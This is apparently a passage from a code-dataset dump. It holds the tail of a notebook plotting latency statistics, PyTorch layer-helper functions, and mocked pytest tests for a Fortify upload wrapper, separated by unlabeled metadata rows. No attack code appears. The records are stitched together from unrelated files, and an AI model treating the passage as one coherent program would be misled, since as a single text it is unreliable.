,324,326,153,150,236,45,85,218,259,182,232,148,193,194,236,219,258,186,207,225,212,284,269,198,248,149,200,291,342,361,329,380,300,105,84,81,280,327,233,230,197,16,12,136,149,302,299,207,237,126,172,204,34,246,203,250,241,200,241,87,174,296,285,197,234,111,106,163,389,386,279,420,226,256,237,241,187,232,219,240,332,328,250,205,244,336,240,237,201,243,258,254,370,365,384,147,170,262,120,215,264,259,233,163,160,206,86,112,199,208,266,263,218,260,366,473,408,318,222,255,411,408,291,288,297,275,316,258,204,240,205,247,236,245,234,272,41,58,177,225,195,183,180,170,246,207,245,33,99,224,247,86,118,83,168,224,240,205,240,204,252,225,217,114,170,267,286,303,235,233,79,81,26,173,108,229,166,173,215,206,243,168,213,178,232,269,208,278,202,88,174,117,234,144,80,92,331,41,160,251,290,141,198,246,83,147,239,237,240,176,137,157,96,92,31,100,20,68,124,207,235,279,213,343,251,206,248,68,65,30,207,239,236,242,272,209,253,184,226,215,255,255,383,255,460,213,303,214,257,338,350,199,238,174,237,195,268,255,419,415,198,239,306,302,236,449,240,236,232,268,264,98,96,151,188,160,200,104,165,189,238,215,238,236,264,257,254,241,281,233,253,34,78,167,198,14,18,176,173,111,108,18,23,234,244,26,78,160,226,118,253,273,162,182,111,224,269,214,170,227,320,319,223,268,122,208,236,223,278,217,260,247,244,184,229,77,225,426,422,357,149,90,93,195,240,72,116,201,245,134,426,213,234,147,188,280,224,268,326,335,338,73,73,240,237,198,236,263,307,151,233,323,364,270,209,242,147,224,268,102,181,217,248,24,104,191,392,203,291,125,171,197,223,204,217,29,27,250,247,118,14,15,158,156,39,44,510,351,19,53,159,158,215,260,66,182,218,200,245,223,578,104,34,194,239,273,319,286,71,176,15,199,378,375,276,233,278,93,283,338,290,188,388,438,217,185,121,182,149,148,271,229,317,11,160,200,245,268,266,151,147,20,16,235,120,180,301,298,333,98,155,115,176,62,61,222,321,404,330,327,295,86,85,282,278,170,219,265,478,469,221,266,70,103,192,241,227,237,128,177,337,336,161,154,282,328,227,271,56,208,143,237,200,242,240,279,275,226,272,239,247,29,210,246,290,230,272,90,134,273,268,246,291,237,193,237,127,359,357,258,277,196,240,188,185,246,256,241,205,250,238,244,104,100,165,141,63,59,228,283,298,295,220,221,262,100,143,198,238,37,33,32,29,196,339,198,227,13,18,311,307,137,137,215,261,195,140,144,213,247,201,235,180,123,179,149,144,190,105,164,348,345,125,122,311,358,257,233,273,196,184,220,228,225,250,221,232,167,163,202,241,132,171,319,195,338,220,152,210,240,199,239,199,239,225,273,83,165,267,265,15,13,358,15,12,26,221,193,380,377,404,192,246,156,175,204,193,189,187,198,217,250,166,207,205,199,222,155,188,211,226,223,197,239,144,140,15,13,189,16,45,30,17,50,20,108,472,517,195,192,162,171,106,183,212,309,431,427,190,170,274,409,172,177,210,174,438,281,239,158,360,168,295,191,182,324,135,287,283,255,151,193,173,194,150,357,165,261,306,145,178,153,145,155,185,11,162,273,279,118,316,243,193,208,151,427,373,243,180,130,281,194,107,135,237,171,238,173,208,279,166,284,163,184,392,260,345,217,111,261,190,218,250,195,423,334,194,128,166,253,188,215,119,148,122,214,234,157,271,213,346,182,153,191,269,186,100,120,375,197,157,244,364,320,84,265,287,255,227,240,190,235,177,186,393,242,203,324,345,238,236,205,203,161,267,168,172,256,183,146,473,136,313,150,257,274,164,140,192,150,220,334,201,206,288,266,239,17,154,159,245,193,197,186,176,158,332,358,174,327,173,336,249,251,217,193,245,318,325,341,214,167,260,180,87,54,139,167,277,207,183,167,156,266,325,108,51,15,107,27,44,49,20,15,42,31,74,17,174,378,224,193,87,112,208,360,202,339,160,306,234,277,84,111,267,276,313,420,433,121,132,349,357,277,178,210,199,381,69,103,352,357,296,268,175,175,12,35,251,256,382,420,65,184,165,193,249,191,109,240,33,28,75,234,32,108,162,262,174,169,171,212,50,13,143,126,76,149,235,389,216,204,355,357,495,543,211,252,54,73,249,170,270,290,165,165,332,254,237,161,165,272,172,210,194,231,249,268,196,228,302,15,146,172,172,158,16,176,20,85,432,56,22,20,11,42,215,248,268,190,252,311,429,449,304,251,324,127,339,429,249,266,208,176,155,205,539,203,169,348,385,238,184,164,171,227,167,366,181,174,260,239,152,204,256,227,258,258,255,78,121,58,190,231,177,225,228,145,163,107,258,156,218,247,292,107,150,177,149,278,109,114,415,96,285,315,317,243,230,256,246,15,165,45,195,47,13,13,34,321,345,170,369,168,143,158,150,255,259,154,361,188,154,219,447,208,236,594,304,338,300,480,589,195,109,260,82,91,154]} ''' #%% # AWS stats = ''' {"numInflight":3,"nosugg":[75,93,45,84,57,80,68,64,150,36,49,34,64,39,59,73,39,98,49,68,44,74,39,48,40,75,40,56,36,67,52,38,52,37,126,32,88,69,67,81,158,39,71,39,72,41,73,61,38,52,42,41,54,35,67,41,68,41,76,38,67,35,63,36,49,45,76,38,49,36,65,38,58,50,68,38,69,39,53,70,38,68,41,38,69,43,74,56,66,67,35,65,37,46,44,78,63,65,75,89,38,93,190,110,39,52,46,81,136,125,54,39,70,37,52,81,38,52,38,70,51,80,66,92,42,201,281,196,124,38,76,57,40,115,38,23,28,83,23,46,74,44,60,74,66,43,75,79,45,22,61,90,63,48,118,95,85,58,112,56,80,89,57,79,60,21,39,54,185,126,44,49,40,41,67,90,138,61,51,71,97,111,81,24,22,155,21,26,42,28,95,40,94,154,104,38,63,41,72,40,61,34,47,44,74,46,100,43,44,60,38,35,47,67,38,52,38,69,36,64,32,63,66,43,73,40,39,59,36,69,103,116,53,35,63,46,54,37,74,72,38,66,38,69,37,148,33,60,46,19,38,71,42,72,38,55,18,37,73,41,71,36,70,36,64,34,44,63,36,43,115,51,61,37,49,59,69,55,78,35,33,60,96,51,67,54,74,44,90,124,135,73,149,154,83,41,109,163,105,82,76,192,70,48,131,191,167,42,45,96,100,61,210,56,60,44,32,66,42,133,25,40,138,19,68,50,66,128,53,53,64,67,87,62,84,86,21,114,81,140,117,54,111,46,47,62,42,81,60,71,76,63,109,59,74,73,52,39,54,78,150,71,75,40,49,71,98,39,143,78,51,56,56,51,113,116,39,93,102,117,95,80,123,67,70,86,202,124,96,115,50,94,98,87,94,49,78,45,44,74,75,83,56,91,192,42,75,46,188,135,83,54,53,61,53,56,30,66,194,85,44,66,52,47,107,21,48,89,42,100,107,38,39,83,49,54,111,82,97,130,144,62,86,87,52,93,74,71,58,69,66,48,74,44,38,53,41,44,50,55,63,95,118,49,40,124,54,54,98,116,61,60,44,97,56,37,46,110,228,119,123,97,158,96,92,93,70,50,123,100,54,105,57,55,42,39,77,42,38,41,48,39,41,86,94,81,45,48,47,21,29,78,26,98,39,60,79,59,56,50,28,83,54,156,103,130,169,223,92,49,128,48,43,121,47,113,45,48,73,135,83,47,143,60,114,54,99,106,114,41,62,44,84,55,39,66,38,20,84,37,41,36,47,77,83,42,82,45,54,56,39,97,185,186,41,75,217,101,105,211,73,87,69,51,56,39,141,181,184,41,155,113,83,39,43,122,147,151,152,73,61,115,56,60,62,80,83,110,146,58,50,40,114,42,68,83,70,120,116,45,83,71,80,74,143,203,55,44,95,89,127,110,185,108,115,100,100,58,45,79,52,40,146,111,80,39,84,110,101,39,79,40,39,49,51],"diverse":[263,156,568,144,91,163,96,165,94,138,111,174,93,153,103,167,136,202,123,88,110,97,181,109,178,88,100,133,95,158,21,133,96,163,21,100,21,98,79,78,65,106,85,167,20,34,20,100,92,157,99,164,115,157,192,169,196,90,154,145,46,161,101,132,108,174,66,109,70,111,45,116,88,101,215,100,108,151,89,204,112,88,224,97,100,199,280,144,236,101,138,160,95,162,21,54,67,137,22,50,92,20,34,90,161,56,102,140,103,169,79,125,156,89,87,102,70,130,99,107,91,158,141,92,255,183,91,132,139,104,204,85,104,135,221,90,143,21,30,21,222,105,178,105,201,128,181,252,198,157,105,194,119,185,90,147,47,53,116,100,172,46,70,125,214,89,167,95,206,207,93,20,150,21,30,192,188,220,193,88,170,103,180,102,180,110,153,49,115,107,185,102,148,95,94,154,139,113,139,90,201,235,322,124,241,87,145,101,154,107,108,151,89,138,257,88,143,91,156,157,234,96,165,92,171,99,197,90,190,21,30,93,167,109,217,177,255,106,176,96,182,89,152,118,103,62,102,135,133,63,106,52,82,159,200,486,73,122,170,99,139,108,60,126,138,114,116,97,184,138,125,141,160,161,228,131,182,133,136,87,103,126,106,165,166,144,202,199,91,150,178,91,158,81,178,64,134,45,117,105,168,85,106,93,184,165,186,296,138,91,162,72,87,117,179,45,89,84,150,86,138,195,90,165,90,144,91,175,86,155,118,222,158,102,172,114,81,91,208,93,138,183,87,52,117,82,108,49,176,53,151,99,169,98,178,126,114,192,94,171,131,132,39,106,105,130,92,162,96,195,94,161,70,140,120,92,129,49,67,22,45,47,64,20,42,57,47,114,136,221,68,97,184,115,98,116,257,256,81,160,270,129,168,168,69,131,242,186,187,87,50,133,133,143,220,222,95,149,131,176,175,147,132,200,21,98,22,79,127,130,163,160,187,188,135,141,148,104,234,236,152,126,126,163,97,206,119,179,135,228,237,142,169,153,154,89,98,193,195,194,191,211,115,219,203,175,173,173,275,76,227,122,206,206,155,137,116,151,157,92,28,28,156,34,22,109,128,144,209,249,84,126,170,193,145,96,133,99,180,240,242,89,149,136,175,185,77,176,90,110,178,115,132,148,148,62,109,148,164,128,169,170,120,66,113,79,95,137,110,144,176,127,119,99,133,24,25,64,85,118,44,178,195,94,44,129,211,102,206,144,155,399,403,170,256,28,116,35,31,24,138,188,101,99,129,200,100,148,149,153,128,106,112,106,123,89,65,133,116,215,241,166,116,101,42,123,126,176,142,115,47,62,132,140,213,215,111,184,119,181,48,56,124,25,58,99,153,152,112,83,91,99,109,89,122,48,103,24,183,95,168,38,228,114,40,110,50,190,66,152,95,81,105,136,135,183,186,95,107,125,160,160,186,145,340,342,59,145,150,105,69,92,62,170,261,261,173,125,86,117,90,90,101,22,137,111,153,142,200,202,308,313,101,222,139,98,131,57,178,154,162,99,192,51,80,94,107,152,103,107,85,76,110,179,119,83,94,216,218,173,182,96,169,151,184,201,145,85,95,113,95,110,135,182,134,134,143,147,112,26,63,222,228,32,151,22,151,75,119,150,98,97,186,187,103,165,165,86,105,84,147,74,119,92,126,51,306,317,21,70,74,30,121,106,159,156,80,52,187,188,191,136,138,179,182,116,151,134,142,152,79,151,74,46,59,174,232,214,213,173,168,295,149,249,153,144,121,51,166,145,146,173,128,205,139,142,82,68,154,190,119,69,91,22,68,171,211,99,69,29,157,139,122,158,133,144,198,98,80,99,107,113,130,165,146,88,143,139,102,153,127,259,96,159,150,142,160,155,193,166,161,118,149,178,192,104,91,104,163,186,50,61,48,193,191,93,85,188,21,148,119,130,155,98,79,54,86,122,114,133,160,169,172,155,86,105,177,215,218,104,203,114,251,256,60,54,112,183,269,121,196,197,152,182,92,174,219,56,53,146,35,99,130,176,46,118,170,127,90,112,198,127,148,32,79,135,24,134,157,96,182,101,133,152,172,268,271,94,107,79,133,178,179,101,193,94,110,124,122,141,150,150,154,154,143,127,78,49,254,263,134,87,66,141,166,24,152,122,155,140,194,131,167,167,111,130,132,53,182,156,289,141,147,140,157,189,233,155,196,179,189,113,106,34,163,177,22,144,116,170,126,99,206,92,108,142,145,92,71,139,152,139,110,114,94,166,52,129,154,166,181,183,154,94,123,121,88,91,107,88,182,216,111,174,119,148,169,103,140,131,24,23,145,26,104,30,29,32,137,138,129,55,51,91,158,159,198,199,235,261,243,107,152,216,218,95,106,227,146,147,56,70,110,111,156,99,154,152,79,100,140,105,85,190,194,183,157,98,114,130,21,23,100,29,22,93,269,154,156,92,182,189,145,157,117,163,212,171,231,230,235,70,80,135,161,95,157,141,133,111,136,213,203,93,97,88,117,225,265,121,89,35,91,103,184,185,201,109,113,46,193,141,151,184,185,108,217,138,140,185,185,146,105,123,89,182,63,70,181,136,137,84,145,91,242,245,101,92,25,177,80,149,149,48,44,141,189,191],"match":[96,155,330,336,84,145,90,253,106,173,88,150,91,214,110,170,82,154,89,157,88,151,82,148,92,86,276,81,148,116,188,143,151,224,88,95,187,85,147,121,177,125,235,133,149,148,238,96,158,86,146,194,20,30,144,155,104,172,42,113,100,172,91,112,143,226,162,136,199,87,153,96,158,94,195,132,106,155,251,91,102,172,94,158,87,110,85,147,106,160,93,160,81,128,124,95,89,240,94,159,110,176,128,189,80,143,84,147,160,89,153,40,102,86,85,85,144,48,69,85,97,159,52,86,158,170,222,154,117,83,142,43,134,129,125,87,182,86,86,183,111,140,103,86,178,127,72,101,159,84,169,90,153,93,160,121,184,68,75,149,90,69,152,85,160,97,98,158,206,94,157,146,226,94,155,86,150,97,156,85,143,84,147,46,58,36,49,84,144,81,176,36,86,145,35,138,151,106,93,126,158,94,66,91,146,135,222,199,262,49,114,93,158,89,152,135,90,154,46,113,86,155,87,50,145,84,188,98,88,111,89,156,93,162,109,137,92,155,160,181,47,66,118,198,85,144,48,116,92,137,46,78,142,94,178,89,150,22,37,90,197,102,166,68,90,157,159,100,87,140,92,155,103,181,84,126,32,93,90,166,256,172,21,98,85,147,103,118,68,88,127,181,96,161,87,180,84,152,38,105,83,184,109,96,177,87,145,129,91,198,83,145,188,127,132,198,43,115,106,160,60,162,126,54,192,189,125,173,84,146,83,133,202,86,151,62,141,44,65,96,166,45,108,122,116,112,39,124,65,171,84,157,43,119,92,90,149,91,155,115,142,199,132,197,85,149,84,147,82,179,102,168,178,87,186,93,154,95,219,90,155,95,113,85,163,85,102,61,119,75,146,109,102,223,43,61,93,155,81,184,124,86,154,99,198,135,195,93,155,111,92,187,47,120,88,77,156,89,151,102,163,95,159,120,185,47,87,109,144,184,154,96,121,20,58,96,201,140,194,133,246,130,196,87,149,155,207,222,240,83,153,83,186,139,96,64,86,88,138,54,69,81,44,109,87,116,44,62,121,84,145,169,165,189,201,85,152,85,154,96,92,87,188,106,117,197,96,207,231,299,98,83,89,183,90,151,46,95,91,151,89,153,86,135,71,140,120,145,92,71,134,96,169,100,214,81,143,96,166,128,145,43,124,83,96,161,105,147,90,157,97,164,86,157,42,63,88,148,179,238,136,139,44,123,100,96,92,117,218,285,88,144,84,108,102,166,88,76,46,110,79,172,137,86,157,147,210,98,161,88,114,89,102,177,123,127,234,230,93,146,190,100,146,167,51,232,89,96,65,206,113,214,98,95,175,41,61,86,166,48,119,91,159,118,180,102,171,35,87,124,120,100,162,100,103,153,65,91,166,141,48,46,92,290,274,277,111,176,92,252,114,188,131,138,242,95,152,181,96,168,86,148,104,138,208,105,150,214,258,83,152,93,22,67,50,71,43,89,86,153,243,238,172,96,229,113,275,95,162,96,192,111,98,107,107,155,144,136,201,292,118,188,100,65,45,65,92,163,45,65,134,92,156,139,139,206,39,49,94,91,150,107,152,80,149,48,68,87,151,93,92,153,92,153,90,154,93,159,92,86,156,85,145,180,154,102,20,56,83,84,57,161,111,94,128,96,43,120,89,151,157,92,181,194,90,107,93,91,135,94,185,20,95,122,90,154,107,91,160,85,116,88,89,147,119,188,66,166,113,134,170,90,92,159,135,155,89,148,85,111,88,130,97,159,96,154,159,218,221,174,197,200,202,327,480,489,488,75,255,141,113,157,172,173,95,50,89,191,192,28,134,135,86,40,154,156,80,133,90,105,110,66,127,136,141,147,117,96,185,185,140,162,127,138,147,163,165,170,140,136,224,276,132,186,185,136,155,156,141,138,109,135,138,62,92,123,145,161,125,137,24,143,188,207,48,105,200,200,88,77,78,99,44,62,115,120,88,92,155,156,91,43,110,81,130,40,63,87,161,92,94,182,151,186,92,200,96,71,96,103,86,154,93,166,45,132,86,146,130,127,204,95,158,91,168,80,239,85,152,115,118,112,85,128,66,133,86,153,90,153,124,139,204,85,155,90,158,92,150,85,96,160,97,199,99,226,84,101,180,81,139,86,156,159,229,92,173,87,110,59,58,47,136,87,154,141,85,169,105,129,152,72,91,93,157,95,186,95,163,47,71,59,84,170,236,106,93,160,59,129,91,156,124,89,160,91,162,97,149,78,148,95,161,91,125,202,135,87,194,114,130,188,90,202,133,170,229,82,146,88,149,88,136,44,114,98,166,98,255,176,112,93,157,79,159,85,146,92,49,127,81,149,47,111,89,148,41,60,133,196,50,75,41,75,41,40,93,93,160,84,145,120,206,105,77,151,90,150,120,178,42,86,91,157,95,162,175,242,101,121,223,92,164,127,191,157,134,87,187,120,103,47,72,93,157,88,87,145,53,119,52,86,87,87,155,86,92,163,91,113,205,221,221,182,185,185,118,272,141,156,139,125,210,211,243,243,187,155,156,140,222,149,126,149,124,169,178,196,88,97,112,125,131,154,187,46,136,113,142,151,233,122,154,90,164,207,209,209,180,116,190,237,142,171,116,193,44,181,211,115,219,226,282,296,176,274,277,278,217,223,228,168,207,155,137,107,95,158,33,139,147,251,252,79,107,171,134,128,133,21,170,64,204,241,150,151,138,185,176,178,167,179,32,134,55,129,145,94,95,54,109,119,172,186,185,173,126,131,112,134,137,179,181,198,198,198,91,126,199,211,216,378,401,403,167,250,257,68,91,189,190,94,44,99,139,188,189,73,127,197,224,142,209,86,128,127,140,148,149,127,138,95,135,216,278,282,132,166,115,140,142,123,167,161,163,53,88,128,140,216,122,171,181,184,47,158,169,51,115,79,87,116,78,77,79,116,183,169,217,228,230,90,158,184,190,137,183,180,186,145,327,341,151,156,160,111,208,250,185,126,72,102,95,127,137,159,144,184,311,313,198,218,218,153,132,181,184,161,172,192,92,139,102,103,181,139,110,217,181,151,106,131,186,153,202,108,105,84,98,134,183,106,148,148,98,226,123,152,154,143,130,186,29,110,128,313,318,318,101,116,160,161,185,191,153,135,181,135,153,77,152,105,156,158,99,174,177,209,167,170,150,165,236,259,150,251,158,128,156,157,183,112,99,108,171,190,200,210,60,93,140,155,145,184,196,154,94,138,128,259,261,158,155,187,194,165,162,176,178,185,191,189,190,48,195,192,205,108,154,174,146,155,117,152,139,83,154,163,158,181,210,220,221,120,258,269,168,183,225,225,227,161,118,184,175,176,159,90,144,155,167,172,188,189,140,146,110,165,180,158,209,252,270,134,136,149,183,186,87,119,131,123,73,152,158,262,265,136,128,152,167,102,134,155,122,170,195,109,145,155,133,297,299,155,203,205,189,127,136,156,145,131,171,184,214,215,139,188,129,160,148,184,109,123,133,77,218,219,121,183,125,146,157,125,137,93,128,96,142,149,151,111,114,60,128,257,75,154,211,220,142,126,59,129,157,37,60,28,64,104,91,105,184,69,245,190,172,143,230,172,234,228,92,123,146,164,143,134,103,148,214,215,64,89,133,222,26,165,166,92,105,247,52,77,112,172,151,174,195,62,182,181,183,146,224,232,134,177,141,192]} ''' #%% import pandas as pd statsx = pd.DataFrame([dict(type=typ, val=val) for typ, vals in json.loads(stats).items() if isinstance(vals, list) for val in vals]) print(len(statsx)) import seaborn as sns sns.violinplot(x='type', y='val', data=statsx) statsx.groupby('type').describe() #%% statsx.groupby('type').sem()
1,818.392157
31,528
0.724094
25,319
92,738
2.652198
0.029464
0.000357
0.001266
0.001713
0.001057
0.001057
0.000923
0
0
0
0
0.718732
0.001272
92,738
51
31,529
1,818.392157
0.006284
0.002696
0
0.461538
0
0.230769
0.995533
0.995241
0
0
0
0
0
1
0
false
0
0.115385
0
0.115385
0.038462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bb8ae6f522615ab552ced896af3f167bd6aec741
1,671
py
Python
new_models/modules.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
9
2019-12-04T12:50:43.000Z
2021-02-28T13:45:30.000Z
new_models/modules.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
null
null
null
new_models/modules.py
BoyuanChen/visual_behavior_modeling
8b6eb0516c562306c5d775632223ad0de775f170
[ "MIT" ]
2
2020-07-09T20:35:15.000Z
2020-11-16T14:03:10.000Z
import torch def conv2d_bn_leakrelu(inch,outch,kernel_size,stride=1,padding=1): convlayer = torch.nn.Sequential( torch.nn.Conv2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding), torch.nn.BatchNorm2d(outch), torch.nn.LeakyReLU() ) return convlayer def conv2d_bn_relu(inch,outch,kernel_size,stride=1,padding=1): convlayer = torch.nn.Sequential( torch.nn.Conv2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding), torch.nn.BatchNorm2d(outch), torch.nn.ReLU() ) return convlayer def deconv_tanh(inch,outch,kernel_size,stride=1,padding=1): convlayer = torch.nn.Sequential( torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding), torch.nn.Tanh() ) return convlayer def deconv_sigmoid(inch,outch,kernel_size,stride=1,padding=1): convlayer = torch.nn.Sequential( torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding), torch.nn.Sigmoid() ) return convlayer def deconv_leakrelu(inch,outch,kernel_size,stride=1,padding=1): convlayer = torch.nn.Sequential( torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding), torch.nn.BatchNorm2d(outch), torch.nn.LeakyReLU() ) return convlayer def deconv_relu(inch,outch,kernel_size,stride=1,padding=1): convlayer = torch.nn.Sequential( torch.nn.ConvTranspose2d(inch,outch,kernel_size=kernel_size,stride=stride,padding=padding), torch.nn.BatchNorm2d(outch), torch.nn.ReLU() ) return convlayer
32.134615
99
0.715141
218
1,671
5.362385
0.110092
0.131737
0.153978
0.195038
0.901625
0.901625
0.901625
0.901625
0.901625
0.901625
0
0.017204
0.165171
1,671
52
100
32.134615
0.820789
0
0
0.634146
0
0
0
0
0
0
0
0
0
1
0.146341
false
0
0.02439
0
0.317073
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bbd0cad2550e72eb80c81a2ecd53f3702e81816f
9,886
py
Python
tests/fortify/upload_test.py
matt-fevold/webbreaker
b500fc620ebba03a27321c8f832ab77bb760b9c5
[ "MIT" ]
7
2018-12-20T19:18:43.000Z
2019-12-10T15:03:41.000Z
tests/fortify/upload_test.py
matt-fevold/webbreaker
b500fc620ebba03a27321c8f832ab77bb760b9c5
[ "MIT" ]
5
2019-04-02T17:07:44.000Z
2020-02-17T07:08:11.000Z
tests/fortify/upload_test.py
matt-fevold/webbreaker
b500fc620ebba03a27321c8f832ab77bb760b9c5
[ "MIT" ]
7
2019-01-10T10:40:55.000Z
2022-03-13T14:08:37.000Z
import mock import pytest from webbreaker.fortify.upload import FortifyUpload def unbound_local_error_exception(**kwargs): raise UnboundLocalError('Test Failure') def value_error_exception(**kwargs): raise ValueError('Test Failure') def io_error_exception(**kwargs): raise IOError('Test Failure') @mock.patch('webbreaker.fortify.upload.FortifyUpload.upload') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') def test_fortify_upload_successful_init_application_name_scan_name_not_none(config_mock, auth_mock, upload_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_scan_name = 'Test Scan Name' expected_project_template = 'Test Template' auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template config_mock.project_template() fortify_upload = FortifyUpload(username=None, password=None, application_name=expected_application, version_name=expected_version, scan_name=expected_scan_name, custom_value=None) assert fortify_upload.username == expected_username assert fortify_upload.password == expected_password upload_mock.assert_called_once_with(expected_application, expected_version, expected_project_template, expected_scan_name, None) assert config_mock.call_count == 1 assert auth_mock.call_count == 1 assert upload_mock.call_count == 1 @mock.patch('webbreaker.fortify.upload.FortifyUpload.upload') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') def test_fortify_upload_successful_init_scan_name_is_none(config_mock, auth_mock, upload_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_project_template = 'Test Template' auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template fortify_upload = FortifyUpload(username=None, password=None, application_name=expected_application, version_name=expected_version, scan_name=None, custom_value=None) assert fortify_upload.username == expected_username assert fortify_upload.password == expected_password # If scan_name is None, scan_name will equal version_name upload_mock.assert_called_once_with(expected_application, expected_version, expected_project_template, expected_version, None) assert config_mock.call_count == 1 assert auth_mock.call_count == 1 assert upload_mock.call_count == 1 @mock.patch('webbreaker.fortify.upload.FortifyUpload.upload') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') def test_fortify_upload_successful_init_application_name_is_none(config_mock, auth_mock, upload_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_scan_name = 'Test Scan Name' expected_project_template = 'Test Template' auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template config_mock.return_value.application_name = expected_application fortify_upload = FortifyUpload(username=None, password=None, application_name=None, version_name=expected_version, scan_name=expected_scan_name, custom_value=None) assert fortify_upload.username == expected_username assert fortify_upload.password == expected_password # If scan_name is None, scan_name will equal version_name upload_mock.assert_called_once_with(expected_application, expected_version, expected_project_template, expected_scan_name, None) assert config_mock.call_count == 1 assert auth_mock.call_count == 1 assert upload_mock.call_count == 1 @mock.patch('webbreaker.fortify.upload.FortifyHelper') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') def test_fortify_upload_upload_successful_upload(config_mock, auth_mock, client_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_scan_name = 'Test Scan Name' expected_project_template = 'Test Template' expected_ssc_url = "test.url" auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template config_mock.return_value.ssc_url = expected_ssc_url fortify_upload = FortifyUpload(username=expected_username, password=expected_password, application_name=expected_application, version_name=expected_version, scan_name=expected_scan_name, custom_value=None) assert fortify_upload.username == expected_username assert fortify_upload.password == expected_password client_mock.assert_called_once_with(fortify_password='password', fortify_url='test.url', fortify_username='user') assert config_mock.call_count == 1 assert auth_mock.call_count == 1 assert client_mock.call_count == 1 @mock.patch('webbreaker.fortify.upload.FortifyHelper') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') @mock.patch('webbreaker.fortify.upload.Logger.app.critical') def test_fortify_upload_upload_throws_value_error(log_mock, config_mock, auth_mock, client_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_scan_name = 'Test Scan Name' expected_project_template = 'Test Template' auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template config_mock.project_template() client_mock.side_effect = value_error_exception with pytest.raises(SystemExit): FortifyUpload(username=expected_username, password=expected_password, application_name=expected_application, version_name=expected_version, scan_name=expected_scan_name, custom_value=None) log_mock.assert_called_once() @mock.patch('webbreaker.fortify.upload.FortifyHelper') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') @mock.patch('webbreaker.fortify.upload.Logger.app.error') def test_fortify_upload_upload_throws_unbound_local_error(log_mock, config_mock, auth_mock, client_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_scan_name = 'Test Scan Name' expected_project_template = 'Test Template' auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template config_mock.project_template() client_mock.side_effect = unbound_local_error_exception with pytest.raises(SystemExit): FortifyUpload(username=expected_username, password=expected_password, application_name=expected_application, version_name=expected_version, scan_name=expected_scan_name, custom_value=None) log_mock.assert_called_once() @mock.patch('webbreaker.fortify.upload.FortifyHelper') @mock.patch('webbreaker.fortify.upload.FortifyAuth') @mock.patch('webbreaker.fortify.upload.FortifyConfig') @mock.patch('webbreaker.fortify.upload.Logger.app.critical') def test_fortify_upload_upload_throws_io_error(log_mock, config_mock, auth_mock, client_mock): expected_username = 'user' expected_password = 'password' expected_application = 'Test Application' expected_version = 'Test Version' expected_scan_name = 'Test Scan Name' expected_project_template = 'Test Template' auth_mock.return_value.authenticate.return_value = expected_username, expected_password config_mock.return_value.project_template = expected_project_template config_mock.project_template() client_mock.side_effect = io_error_exception with pytest.raises(SystemExit): FortifyUpload(username=expected_username, password=expected_password, application_name=expected_application, version_name=expected_version, scan_name=expected_scan_name, custom_value=None) log_mock.assert_called_once()
43.170306
117
0.713635
1,067
9,886
6.243674
0.06373
0.08586
0.08631
0.093666
0.927049
0.922546
0.917742
0.917742
0.917742
0.907986
0
0.001544
0.21404
9,886
228
118
43.359649
0.855856
0.011228
0
0.838889
0
0
0.151146
0.098035
0
0
0
0
0.15
1
0.055556
false
0.144444
0.016667
0
0.072222
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
a567607f79b30c0e24eab59212ea018ac886f35f
2,051
py
Python
tests/test_fuzzing.py
odidev/cmaes
a10ac399aec7ce759f29ae3ea9611e10ca647f1c
[ "MIT" ]
134
2020-01-31T01:17:33.000Z
2021-08-14T18:36:00.000Z
tests/test_fuzzing.py
odidev/cmaes
a10ac399aec7ce759f29ae3ea9611e10ca647f1c
[ "MIT" ]
74
2020-01-30T20:18:09.000Z
2021-04-10T16:53:31.000Z
tests/test_fuzzing.py
odidev/cmaes
a10ac399aec7ce759f29ae3ea9611e10ca647f1c
[ "MIT" ]
32
2020-01-30T20:32:51.000Z
2021-07-21T14:09:06.000Z
